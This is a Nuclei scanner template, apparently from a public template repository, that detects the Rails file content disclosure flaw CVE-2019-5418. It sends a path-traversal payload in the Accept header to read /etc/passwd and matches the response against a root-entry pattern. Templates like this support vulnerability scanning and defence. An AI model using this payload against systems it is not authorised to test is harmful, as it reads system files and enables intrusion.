nuclei-templates/cves/CVE-2019-5418.yaml

23 lines
439 B
YAML
Raw Normal View History

2020-04-08 15:07:10 +00:00
id: CVE-2019-5418
info:
name: File Content Disclosure on Rails
author: omarkurt
severity: medium
#reference: https://github.com/omarkurt/CVE-2019-5418
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Accept: ../../../../../../../../etc/passwd{{
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body